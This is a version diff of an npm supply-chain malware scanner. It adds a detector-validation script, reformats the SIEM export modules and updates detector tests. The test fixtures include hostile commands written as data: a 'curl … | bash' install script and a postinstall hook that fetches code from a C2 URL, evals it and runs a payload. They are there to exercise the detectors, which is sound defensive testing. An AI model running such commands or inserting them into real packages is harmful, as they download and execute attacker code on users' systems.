@lateos/npm-scan 1.0.0 → 1.1.1

package/backend/scripts/validate-d10-d13.js

@@ -0,0 +1,103 @@
+import { scan as d10scan } from '../detectors/tier1-self-propagation.js';
+import { scan as d11scan } from '../detectors/tier1-encrypted-c2.js';
+import { scan as d12scan } from '../detectors/tier1-transitive-deps.js';
+import { scan as d13scan } from '../detectors/tier1-maintainer-compromise.js';
+
+const results = [];
+
+// D10 + D13: @redhat-cloud-services Miasma (32 packages, 12 versions in 2 hours)
+const miasmaTime = { '0.0.1': '2024-01-01T00:00:00.000Z' };
+for (let i = 0; i < 12; i++) {
+  const t = new Date('2026-06-01T03:00:00Z');
+  t.setMinutes(t.getMinutes() - (12 - i) * 10);
+  miasmaTime[`2.${i}.0`] = t.toISOString();
+}
+const miasmaRegistryD10 = {
+  time: miasmaTime,
+  namespacePackages: Array.from({ length: 31 }, (_, i) => `@redhat-cloud-services/pkg-${i}`),
+};
+const miasmaRegistryD13 = {
+  time: miasmaTime,
+  crossPackageBurst: true,
+};
+
+const d10Result = await d10scan(
+  { name: '@redhat-cloud-services/foo', version: '2.11.0' },
+  [],
+  miasmaRegistryD10,
+  null
+);
+const d13Result = await d13scan(
+  { name: '@redhat-cloud-services/foo', version: '2.11.0' },
+  [],
+  miasmaRegistryD13,
+  null
+);
+
+results.push({
+  campaign: '@redhat-cloud-services Miasma',
+  detectors: {
+    D10: { triggered: d10Result.length > 0, confidence: d10Result[0]?.confidenceScore || 0 },
+    D13: { triggered: d13Result.length > 0, confidence: d13Result[0]?.confidenceScore || 0 },
+  },
+});
+
+// D11: TanStack Mini Shai-Hulud
+const tanStackFiles = [
+  { path: 'install.sh', content: 'curl -s https://filev2.getsession.org/upload | bash' },
+];
+const d11Result = await d11scan(
+  { name: '@tanstack/react-query', version: '4.29.1' },
+  tanStackFiles,
+  null,
+  null
+);
+
+results.push({
+  campaign: 'TanStack Mini Shai-Hulud',
+  detectors: {
+    D11: { triggered: d11Result.length > 0, confidence: d11Result[0]?.confidenceScore || 0 },
+  },
+});
+
+// D12: Axios Backdoor (plain-crypto-js)
+const d12Result = await d12scan(
+  {
+    name: 'test-app',
+    dependencies: { axios: '1.14.1', 'plain-crypto-js': '1.0.0', lodash: '4.17.21' },
+  },
+  [],
+  null,
+  null
+);
+
+results.push({
+  campaign: 'Axios Backdoor',
+  detectors: {
+    D12: { triggered: d12Result.length > 0, confidence: d12Result[0]?.confidenceScore || 0 },
+  },
+});
+
+let allPassed = true;
+for (const { campaign, detectors } of results) {
+  const details = Object.entries(detectors)
+    .map(([d, r]) => `${d}: ${r.triggered ? 'PASS' : 'FAIL'} (confidence ${r.confidence})`)
+    .join(', ');
+  const campaignPassed = Object.values(detectors).every((r) => r.triggered);
+  console.log(`${campaignPassed ? 'PASS' : 'FAIL'} ${campaign}: ${details}`);
+  if (!campaignPassed) allPassed = false;
+}
+
+if (allPassed) {
+  console.log('\nAll campaigns validated successfully.');
+} else {
+  console.log('\nSome campaigns FAILED validation.');
+}
+
+const output = {
+  timestamp: new Date().toISOString(),
+  results,
+  passed: allPassed,
+};
+const fs = await import('fs');
+fs.writeFileSync('validation-d10-d13.json', JSON.stringify(output, null, 2));

package/backend/scripts/validate-detectors.js

@@ -16,14 +16,19 @@ function loadFixture(filePath) {
     return [];
   }
   const text = readFileSync(abs, 'utf-8');
-  return text.split('\n').filter(l => l.trim()).map(l => JSON.parse(l));
+  return text
+    .split('\n')
+    .filter((l) => l.trim())
+    .map((l) => JSON.parse(l));
 }
 
 async function fetchNpmMetadata(pkgName, version) {
   try {
     const url = `https://registry.npmjs.org/${encodeURIComponent(pkgName)}/${version}`;
     const response = await fetch(url, { signal: AbortSignal.timeout(5000) });
-    if (!response.ok) return null;
+    if (!response.ok) {
+      return null;
+    }
     return await response.json();
   } catch {
     console.warn(`  [WARN] Registry fetch failed for ${pkgName}@${version}; using fixture data`);
@@ -32,8 +37,12 @@ async function fetchNpmMetadata(pkgName, version) {
 }
 
 function constructRegistryMeta(pkg, liveMeta) {
-  if (liveMeta) return liveMeta;
-  if (pkg.mockRegistryMeta) return pkg.mockRegistryMeta;
+  if (liveMeta) {
+    return liveMeta;
+  }
+  if (pkg.mockRegistryMeta) {
+    return pkg.mockRegistryMeta;
+  }
   return null;
 }
 
@@ -48,9 +57,7 @@ function constructPkgJson(pkg) {
 async function validateDetectors(campaigns, outputFile) {
   const allResults = [];
 
-  const campaignKeys = campaigns === 'all'
-    ? Object.keys(CAMPAIGN_FIXTURES)
-    : [campaigns];
+  const campaignKeys = campaigns === 'all' ? Object.keys(CAMPAIGN_FIXTURES) : [campaigns];
 
   for (const campaignKey of campaignKeys) {
     const fixturePath = CAMPAIGN_FIXTURES[campaignKey];
@@ -71,7 +78,7 @@ async function validateDetectors(campaigns, outputFile) {
 
         const findings = await runAll(pkgJson, [], registryMeta, []);
 
-        const detectedIds = [...new Set(findings.map(f => f.id))];
+        const detectedIds = [...new Set(findings.map((f) => f.id))];
 
         const result = {
           package: pkg.package,
@@ -82,7 +89,7 @@ async function validateDetectors(campaigns, outputFile) {
           expected_detectors: pkg.expected_detectors,
           detected_detectors: detectedIds,
           detection_count: findings.length,
-          detections: findings.map(f => ({
+          detections: findings.map((f) => ({
             id: f.id,
             detector: f.detector,
             severity: f.severity,
@@ -99,7 +106,7 @@ async function validateDetectors(campaigns, outputFile) {
         allResults.push(result);
 
         const expectedCount = pkg.expected_detectors.length;
-        const hitCount = detectedIds.filter(id => pkg.expected_detectors.includes(id)).length;
+        const hitCount = detectedIds.filter((id) => pkg.expected_detectors.includes(id)).length;
         console.log(
           `  ${hitCount > 0 ? '✓' : '✗'} ${pkg.package}@${pkg.version}: ${hitCount}/${expectedCount} expected detectors fired`
         );
@@ -120,12 +127,12 @@ async function validateDetectors(campaigns, outputFile) {
   }
 
   if (outputFile) {
-    const lines = allResults.map(r => JSON.stringify(r)).join('\n') + '\n';
+    const lines = allResults.map((r) => JSON.stringify(r)).join('\n') + '\n';
     writeFileSync(outputFile, lines, 'utf-8');
   }
 
-  const processed = allResults.filter(r => !r.error).length;
-  const errors = allResults.filter(r => r.error).length;
+  const processed = allResults.filter((r) => !r.error).length;
+  const errors = allResults.filter((r) => r.error).length;
   console.log(`\n[SUMMARY] Processed ${processed} packages, ${errors} errors`);
   console.log(`[INFO] Results written to ${outputFile}`);
 
@@ -136,7 +143,9 @@ const args = process.argv.slice(2);
 const campaignArg = args[0] || 'all';
 const outputArg = args[1] ? resolve(args[1]) : resolve('validation-results.jsonl');
 
-validateDetectors(campaignArg, outputArg).then(() => process.exit(0)).catch(err => {
-  console.error(`[ERROR] ${err.message}`);
-  process.exit(1);
-});
+validateDetectors(campaignArg, outputArg)
+  .then(() => process.exit(0))
+  .catch((err) => {
+    console.error(`[ERROR] ${err.message}`);
+    process.exit(1);
+  });

package/backend/siem/cef.js

@@ -1,33 +1,35 @@
 export function generateCEF(scans) {
   const entries = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       const desc = (f.description || f.title || '').replace(/\\/g, '\\\\').replace(/\|/g, '\\|');
       const sevMap = { critical: 10, high: 8, medium: 5, low: 2 };
       const sev = sevMap[f.severity] || 5;
       const pkgName = (s.package_name || 'unknown').replace(/\|/g, '\\|');
       const pkgVer = (s.version || '').replace(/\|/g, '\\|');
-      entries.push([
-        'CEF:0',
-        'npm-scan',
-        'npm-scan',
-        process.env.npm_package_version || '0.4.0',
-        atkId,
-        desc,
-        String(sev),
-        `suser=${pkgName} ${pkgVer}`,
-        `msg=${desc}`,
-        `cs1=${atkId}`,
-        `cs1Label=atkId`,
-        `cs2=${f.severity}`,
-        `cs2Label=severity`,
-        `cs3=${pkgName}`,
-        `cs3Label=package`,
-        `cs4=${pkgVer}`,
-        `cs4Label=version`,
-      ].join('|'));
+      entries.push(
+        [
+          'CEF:0',
+          'npm-scan',
+          'npm-scan',
+          process.env.npm_package_version || '0.4.0',
+          atkId,
+          desc,
+          String(sev),
+          `suser=${pkgName} ${pkgVer}`,
+          `msg=${desc}`,
+          `cs1=${atkId}`,
+          `cs1Label=atkId`,
+          `cs2=${f.severity}`,
+          `cs2Label=severity`,
+          `cs3=${pkgName}`,
+          `cs3Label=package`,
+          `cs4=${pkgVer}`,
+          `cs4Label=version`,
+        ].join('|')
+      );
     }
   }
   return entries.join('\n');
-}
+}

package/backend/siem/ecs.js

@@ -1,7 +1,7 @@
 export function generateECS(scans) {
   const events = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       const sevMap = { critical: 100, high: 80, medium: 50, low: 20 };
       events.push({
@@ -37,5 +37,5 @@ export function generateECS(scans) {
       });
     }
   }
-  return events.map(e => JSON.stringify(e)).join('\n');
-}
+  return events.map((e) => JSON.stringify(e)).join('\n');
+}

package/backend/siem/index.js

@@ -16,4 +16,4 @@ export function generateSIEM(scans, format = 'cef') {
     default:
       throw new Error(`Unknown SIEM format: ${format}. Supported: cef, ecs, sentinel, qradar`);
   }
-}
+}

package/backend/siem/qradar.js

@@ -1,7 +1,7 @@
 export function generateQRadar(scans) {
   const events = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       events.push({
         source: 'npm-scan',
@@ -32,7 +32,7 @@ export function generateQRadar(scans) {
       });
     }
   }
-  return events.map(e => JSON.stringify(e)).join('\n');
+  return events.map((e) => JSON.stringify(e)).join('\n');
 }
 
 const QID_MAP = {
@@ -54,4 +54,4 @@ function _qrCategory(severity) {
     low: 'Low Severity Malware',
   };
   return map[severity] || 'Medium Severity Malware';
-}
+}

package/backend/siem/sentinel.js

@@ -1,7 +1,7 @@
 export function generateSentinel(scans) {
   const events = [];
   for (const s of scans) {
-    for (const f of (s.findings || [])) {
+    for (const f of s.findings || []) {
       const atkId = f.atk_id || f.id;
       events.push({
         TimeGenerated: new Date().toISOString(),
@@ -25,4 +25,4 @@ export function generateSentinel(scans) {
     }
   }
   return JSON.stringify(events, null, 2);
-}
+}

package/backend/tests-d5-enhanced.test.js

@@ -11,10 +11,10 @@ describe('D5: Binary Embed Enhancement', () => {
     ];
     const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
     const findings = await detectors.runAll(pkg, [], null, allFiles);
-    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
     assert(matches.length > 0, 'Expected TIER1-BINARY-EMBED finding');
-    const hasCrossPlatform = matches.some(m =>
-      m.evidence.some(e => e.includes('cross-platform')),
+    const hasCrossPlatform = matches.some((m) =>
+      m.evidence.some((e) => e.includes('cross-platform'))
     );
     assert(hasCrossPlatform, 'Expected cross-platform binary set evidence');
   });
@@ -26,20 +26,21 @@ describe('D5: Binary Embed Enhancement', () => {
     ];
     const pkg = { name: 'suspicious-pkg', version: '1.0.0' };
     const findings = await detectors.runAll(pkg, [], null, allFiles);
-    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
-    const hasHighScore = matches.some(m => m.confidenceScore > 85);
-    assert(hasHighScore, `No finding with confidenceScore > 85; scores: ${matches.map(m => m.confidenceScore).join(', ')}`);
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
+    const hasHighScore = matches.some((m) => m.confidenceScore > 85);
+    assert(
+      hasHighScore,
+      `No finding with confidenceScore > 85; scores: ${matches.map((m) => m.confidenceScore).join(', ')}`
+    );
   });
 
   test('D5: single binary not flagged as cross-platform', async () => {
-    const allFiles = [
-      { path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' },
-    ];
+    const allFiles = [{ path: 'bin/agent-linux-x64', content: String.fromCharCode(0x7f) + 'ELF' }];
     const pkg = { name: 'normal-pkg', version: '1.0.0' };
     const findings = await detectors.runAll(pkg, [], null, allFiles);
-    const matches = findings.filter(f => f.id === 'TIER1-BINARY-EMBED');
-    const hasPlatformLabel = matches.some(m =>
-      m.evidence.some(e => e.includes('cross-platform')),
+    const matches = findings.filter((f) => f.id === 'TIER1-BINARY-EMBED');
+    const hasPlatformLabel = matches.some((m) =>
+      m.evidence.some((e) => e.includes('cross-platform'))
     );
     assert(!hasPlatformLabel, 'Single binary should not be flagged as cross-platform');
   });

package/backend/tests-d6-version-anomaly.test.js

@@ -7,7 +7,7 @@ describe('D6: Version Anomaly', () => {
     const pkg = { name: '@widget/core', version: '99.99.99' };
     const registryMeta = ['1.0.0', '1.5.0', '2.0.0', '2.1.0', '3.0.0', '4.0.0', '5.0.0', '5.3.2'];
     const findings = await detectors.runAll(pkg, [], registryMeta);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
     assert(match.confidenceScore > 90, `confidenceScore ${match.confidenceScore} <= 90`);
   });
@@ -16,7 +16,7 @@ describe('D6: Version Anomaly', () => {
     const pkg = { name: 'internal-utils', version: '11.11.11' };
     const registryMeta = ['1.0.0', '1.0.1', '1.1.0', '1.2.0', '2.0.0'];
     const findings = await detectors.runAll(pkg, [], registryMeta);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
     assert(match.confidenceScore > 85, `confidenceScore ${match.confidenceScore} <= 85`);
   });
@@ -24,18 +24,27 @@ describe('D6: Version Anomaly', () => {
   test('D6: does NOT flag legitimate 2.0.0 jump from 1.9.9', async () => {
     const pkg = { name: 'stable-lib', version: '2.0.0' };
     const registryMeta = [
-      '1.0.0', '1.1.0', '1.2.0', '1.3.0', '1.4.0', '1.5.0',
-      '1.6.0', '1.7.0', '1.8.0', '1.9.0', '1.9.9',
+      '1.0.0',
+      '1.1.0',
+      '1.2.0',
+      '1.3.0',
+      '1.4.0',
+      '1.5.0',
+      '1.6.0',
+      '1.7.0',
+      '1.8.0',
+      '1.9.0',
+      '1.9.9',
     ];
     const findings = await detectors.runAll(pkg, [], registryMeta);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(!match, 'Should not flag legitimate 2.0.0 major bump');
   });
 
   test('D6: handles null registry gracefully — degrades confidence', async () => {
     const pkg = { name: 'offline-pkg', version: '99.99.99' };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(match, 'Expected TIER1-VERSION-ANOMALY finding');
     assert(match.confidenceScore < 70, `confidenceScore ${match.confidenceScore} >= 70`);
   });
@@ -44,7 +53,7 @@ describe('D6: Version Anomaly', () => {
     const pkg = { name: 'react', version: '99.99.99' };
     const registryMeta = ['1.0.0', '2.0.0'];
     const findings = await detectors.runAll(pkg, [], registryMeta);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(!match);
   });
 
@@ -52,7 +61,7 @@ describe('D6: Version Anomaly', () => {
     const pkg = { name: 'widget-core', version: '5.4.1' };
     const registryMeta = ['1.0.0', '2.0.0', '3.0.0', '4.0.0', '5.0.0', '5.4.0'];
     const findings = await detectors.runAll(pkg, [], registryMeta);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-ANOMALY');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-ANOMALY');
     assert(!match);
   });
 });

package/backend/tests-d6.test.js

@@ -8,7 +8,7 @@ describe('D6a — tier1-version-confusion', () => {
   test('D6a: detects exact sentinel version 99.99.99', async () => {
     const pkg = { name: 'internal-utils', version: '99.99.99' };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
     assert(match, 'Expected TIER1-VERSION-CONFUSION finding');
     assert.equal(match.confidence, 'HIGH');
     assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
@@ -18,23 +18,26 @@ describe('D6a — tier1-version-confusion', () => {
     for (const version of ['9.9.9', '10.10.10', '11.11.11']) {
       const pkg = { name: 'corp-auth', version };
       const findings = await detectors.runAll(pkg);
-      const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+      const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
       assert(match, `Expected finding for version ${version}`);
-      assert(match.confidenceScore >= 60, `confidenceScore ${match.confidenceScore} < 60 for version ${version}`);
+      assert(
+        match.confidenceScore >= 60,
+        `confidenceScore ${match.confidenceScore} < 60 for version ${version}`
+      );
     }
   });
 
   test('D6a: no finding on legitimate semver', async () => {
     const pkg = { name: 'lodash', version: '4.17.21' };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
     assert(!match);
   });
 
   test('D6a: no finding on KNOWN_REPUTABLE_PACKAGES regardless of version', async () => {
     const pkg = { name: 'react', version: '99.99.99' };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-VERSION-CONFUSION');
+    const match = findings.find((f) => f.id === 'TIER1-VERSION-CONFUSION');
     assert(!match);
   });
 });
@@ -47,11 +50,12 @@ describe('D6b — tier1-multistage-postinstall', () => {
       name: 'malicious-pkg',
       version: '1.0.0',
       scripts: {
-        postinstall: 'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+        postinstall:
+          'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
       },
     };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
     assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
     assert.equal(match.confidence, 'HIGH');
     assert(match.confidenceScore >= 80, `confidenceScore ${match.confidenceScore} < 80`);
@@ -66,7 +70,7 @@ describe('D6b — tier1-multistage-postinstall', () => {
       },
     };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
     assert(match, 'Expected TIER1-MULTISTAGE-POSTINSTALL finding');
     assert(match.confidenceScore >= 75, `confidenceScore ${match.confidenceScore} < 75`);
   });
@@ -80,7 +84,7 @@ describe('D6b — tier1-multistage-postinstall', () => {
       },
     };
     const findings = await detectors.runAll(pkg);
-    const match = findings.find(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    const match = findings.find((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
     assert(!match);
   });
 
@@ -89,11 +93,12 @@ describe('D6b — tier1-multistage-postinstall', () => {
       name: 'dual-pkg',
       version: '1.0.0',
       scripts: {
-        postinstall: 'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
+        postinstall:
+          'node -e "fetch(process.env.C2_URL).then(r=>r.text()).then(eval)" && execFile("./payload")',
       },
     };
     const findings = await detectors.runAll(pkg);
-    const d6bMatches = findings.filter(f => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
+    const d6bMatches = findings.filter((f) => f.id === 'TIER1-MULTISTAGE-POSTINSTALL');
     assert(d6bMatches.length > 0, 'Expected at least one TIER1-MULTISTAGE-POSTINSTALL finding');
     assert.equal(d6bMatches[0].id, 'TIER1-MULTISTAGE-POSTINSTALL');
     assert(d6bMatches[0].id !== 'ATK-003');
@@ -105,12 +110,17 @@ describe('D6b — tier1-multistage-postinstall', () => {
 describe('D2 — named signature', () => {
   test('D2 Miasma signature: detects "Miasma: The Spreading Blight" → CRITICAL', async () => {
     const pkg = { name: 'test-pkg', version: '1.0.0' };
-    const jsFiles = [{ path: 'evil.js', content: 'const id = "Miasma: The Spreading Blight"; doEvil();' }];
+    const jsFiles = [
+      { path: 'evil.js', content: 'const id = "Miasma: The Spreading Blight"; doEvil();' },
+    ];
     const findings = await detectors.runAll(pkg, jsFiles, {}, []);
-    const match = findings.find(f => f.id === 'TIER1-INFOSTEALER');
+    const match = findings.find((f) => f.id === 'TIER1-INFOSTEALER');
     assert(match, 'Expected TIER1-INFOSTEALER finding from Miasma signature');
     assert.equal(match.confidence, 'CRITICAL');
     assert.equal(match.confidenceScore, 98);
-    assert(match.evidence.some(e => e.includes('Miasma: The Spreading Blight')), 'evidence should contain the signature string');
+    assert(
+      match.evidence.some((e) => e.includes('Miasma: The Spreading Blight')),
+      'evidence should contain the signature string'
+    );
   });
 });